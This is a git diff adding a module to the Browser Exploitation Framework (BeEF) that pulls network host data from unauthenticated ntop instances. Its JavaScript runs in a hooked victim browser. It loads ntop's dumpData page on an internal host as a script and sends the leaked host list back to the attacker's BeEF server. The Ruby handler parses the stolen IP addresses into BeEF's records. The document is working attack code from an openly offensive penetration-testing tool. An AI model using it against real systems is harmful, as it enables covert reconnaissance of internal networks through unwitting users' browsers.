diff --git a/modules/network/get_ntop_network_hosts/command.js b/modules/network/get_ntop_network_hosts/command.js new file mode 100644 index 000000000..54ff2c871 --- /dev/null +++ b/modules/network/get_ntop_network_hosts/command.js @@ -0,0 +1,35 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + + load_script = function(url) { + beef.debug("[Get ntop Network Hosts] Loading: " + url); + var s = document.createElement("script"); + s.type = 'text/javascript'; + s.src = url; + document.body.appendChild(s); + } + + read_ntop = function() { + try { + var result = JSON.stringify(ntopDict); + beef.debug("[Get ntop Network Hosts] Success: Found ntop data (" + result.length + ' bytes)'); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto=http&ip=<%= @rhost %>&port=<%= @rport %>&data="+result, beef.are.status_success()); + } catch(e) { + beef.debug("[Get ntop Network Hosts] Error: Did not find ntop"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result=did not find ntop', beef.are.status_error()); + return; + } + } + + load_script("http://"+rhost+":"+rport+"/dumpData.html?language=python&view=long"); + setTimeout("read_ntop()", 10000); + +}); + diff --git a/modules/network/get_ntop_network_hosts/config.yaml b/modules/network/get_ntop_network_hosts/config.yaml new file mode 100644 index 000000000..0212e9da5 --- /dev/null +++ b/modules/network/get_ntop_network_hosts/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + get_ntop_network_hosts: + enable: true + category: "Network" + name: "Get ntop Network Hosts" + description: "This module retrieves network information from ntop (unauthenticated).
Tested on ntop v.5.0.1 on Ubuntu and v.5.0 Fedora RPM. This module does not work for ntop-ng." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/network/get_ntop_network_hosts/module.rb b/modules/network/get_ntop_network_hosts/module.rb new file mode 100644 index 000000000..adf301ea1 --- /dev/null +++ b/modules/network/get_ntop_network_hosts/module.rb @@ -0,0 +1,42 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Get_ntop_network_hosts < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '3000' } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + + configuration = BeEF::Core::Configuration.instance + if configuration.get("beef.extension.network.enable") == true + if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&data=(.+)\z/ + proto = $1 + ip = $2 + port = $3 + data = $4 + session_id = @datastore['beefhook'] + type = 'ntop' + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found 'ntop' [proto: #{proto}, ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type) + end + data.to_s.scan(/"hostNumIpAddress":"([\d\.]+)"/).flatten.each do |ip| + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found host #{ip}") + BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip, :port => port) + end + end + end + end + end + +end +